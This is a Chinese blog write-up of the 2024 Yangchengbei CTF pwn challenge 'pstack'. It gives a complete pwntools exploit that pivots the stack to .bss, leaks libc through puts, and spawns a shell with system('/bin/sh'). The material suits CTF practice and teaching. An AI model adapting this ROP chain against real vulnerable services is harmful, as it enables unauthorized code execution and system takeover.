[羊城杯2024]-Pwn:pstack解析(栈迁移)

最新推荐文章于 2024-09-09 21:36:49 发布
最新推荐文章于 2024-09-09 21:36:49 发布
阅读量227 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/141675588
版权

查看保护

查看ida

一个输入点,只能刚好溢出到返回地址。

完整exp:

from pwn import*
p=process('./pstack')
elf=ELF('./pstack')
pop_rdi=0x0000000000400773
leave_ret=0x00000000004006db
puts_plt=elf.plt['puts']
main=elf.sym['main']
bss=elf.bss()+0x800
vuln=elf.sym['vuln']
vuln_read=0x4006C4
puts_got=elf.got['puts']
pop_rbp=0x00000000004005b0
ret=0x0000000000400506

def gdbs():
    gdb.attach(p)
    pause()

payload=b'a'*0x30+p64(bss+0x20)+p64(vuln_read)
p.send(payload)
payload=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(pop_rbp)+p64(bss+0x48)+p64(vuln_read)
payload+=p64(bss-0x18)+p64(leave_ret)
p.send(payload)
puts_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
print("puts_addr= "+hex(puts_addr))
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libcbase=puts_addr-libc.sym['puts']
system=libcbase+libc.sym['system']
binsh=libcbase+next(libc.search(b'/bin/sh'))
payload=p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)
p.sendline(payload)

p.interactive()

补充点1:vuln的read中,lea指令会把bss段的地址间接传入rsi,可以利用这一点进行泄露libc地址和getshell。

补充点2:可以利用覆盖rbp的地址和leave ret灵活变换执行流。

clxhzg
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
[VNCTF2024]-PWN:preinit解析(逆向花指令,绕过strcmp,函数修改,机器码)
2301_79326813的博客
02-29 1880
这边其实看反汇编没啥大作用,需要自己动调。但是前面的绕过strcmp还是要看一下的。
[BUUCTF]-PWN:ciscn_2019_es_2解析迁移
2301_79326813的博客
12-11 1313
答:先说明一点,我们第二次构造payload时往ebp填入ebp-0x38是为了让它在执行完函数原有的leave,ret之后ebp指向b'a'*4的头地址,但要注意这里不是输入ebp-0x28,因为第一个printf打印出来的是ebp里的内容而不是ebp的地址,通过动态调试可以知道ebp里面的内容是ebp+0x10的地址,我们打印出来的就是ebp+10的地址,这里就要填入ebp-0x38才能使ebp指向b'a'*4的头。答:首先要明白32位是通过传参的,这样的形式是32位的调用函数的调用规则。
[蓝桥2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)
2301_79326813的博客
04-27 623
查看保护查看ida这里有一次溢出,并且题目给了我们system函数。这里的知识点没有那么复杂。
[CTF]-PWN:格式化字符串漏洞题综合解析
2301_79326813的博客
08-04 1079
有格式化字符串漏洞,可以修改printf的got表内地址为system,传参getshell解法一:在32位中可以使用fmtstr_payload直接修改,免去很多麻烦这个没啥好讲的,只是这个函数64位几乎用不了。解法二:在这个方法中没有使用fmtstr_payload函数,虽然麻烦一点,但必须掌握。先回顾一下知识点在32位中,libc函数的真实地址共有32位(8位一个字节),其中前8位对于所有libc函数来说都是相同的,后24位不同。
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar ...
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
在2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 ...
browser-pwn:针对浏览器开发的资源的更新集合
02-25
浏览器拥有 浏览器世界由4个主要参与者主导: Chrome/Chrome(闪烁引擎) Firefox(壁虎引擎) Safari(WebKit-Engine) Edge(闪烁引擎(以前的EdgeHTML-Engine)) 以下分为两部分: 有助于了解其架构和实施...
【JAVA】Tomcat性能优化、安全配置、资源控制以及运行模式超详细
A的博客
09-09 1413
nio(new I/O),是Java SE 1.4及后续版本提供的一种新的I/O操作方式(即java.nio包及其子包)。Java nio是一个基于缓冲区、并能提供非阻塞I/O操作的Java API,因此nio也被看成是non-blocking I/O的缩写。
网站安全需求分析与安全保护工程
weixin_49171105的博客
09-09 369
网站:是基于B/S技术架构的综合信息服务平台,主要提供网页信息及业务后台对外接口服务。
零信任安全:重新思考数字世界的访问
网络研究观
09-09 642
零信任安全在当前数字时代的关键重要性和有效性,将其作为增强网络安全弹性的基本战略。‍
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 417
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
智能对决:提示词攻防中的AI安全博弈
weixin_41496173的博客
09-05 811
2024年上海AIGC开发者大会上,知名提示词爱好者工程师云中嘉树发表了关于**AI提示词攻防与安全博弈**的精彩演讲。他深入探讨了当前AI产品的安全现状,提示词攻击的常见手段及其应对策略。本文将对他的演讲进行详细的解读与分析,并结合实际案例和技术手段,探讨如何在AI应用开发中提高安全性。
Gartner发布安全威胁情报产品和服务市场指南:威胁情报产品和服务需具备的8项核心能力和21项可选能力
lurenjia404的博客
09-04 1302
安全和风险管理领导者很难知道哪些威胁会真正影响到他们的组织。他们应该利用这项研究来选择正确的安全威胁情报产品和服务,并更有效地了解和应对威胁形势。
亚信安全出席第五届国际反病毒大会 探究AI现代网络勒索治理
亚信安全官方账号的博客
09-09 347
亚信安全出席活动并发表题为《AI时代下现代网络勒索治理》的演讲
C++20标准对线程库的改进:更安全、更高效的并发编程
最新发布
jianglq的博客
09-09 622
C++20 是 C++ 语言的一个重要里程碑,它引入了许多新特性,其中就包括对线程库(thread)的重大改进。这些改进不仅增强了语言的并发编程能力,还解决了先前版本中的一些痛点问题。
低代码平台中的统一认证与单点登录(SSO):实现简化与安全的用户管理
CC_longhua的博客
09-04 1416
低代码平台是一种允许用户通过图形化界面而非编写大量代码来构建应用程序的工具。这种平台的优势在于能够大幅度缩短开发周期、降低开发成本,并使得非技术人员也能参与到应用开发中。常见的低代码平台有OutSystems、Mendix、Appian等。统一认证是指通过一个中央系统进行用户身份验证的过程。用户只需在中央认证系统中进行一次身份验证,即可访问多个应用程序或服务。这种方式不仅提升了用户体验,还简化了后台的用户管理。对于有特殊需求的企业,低代码平台通常允许用户通过自定义代码来实现更复杂的认证逻辑。
NJUPT PWN入门:理解溢出原理与利用方法
溢出是计算机安全领域中一个重要的概念,尤其是在逆向工程(Pwn)中扮演着关键角色。Pwn是一个黑客术语,用于描述攻破计算机系统或设备的过程,通常伴随着成功的黑客入侵声“砰”。本文将深入探讨溢出的基本原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值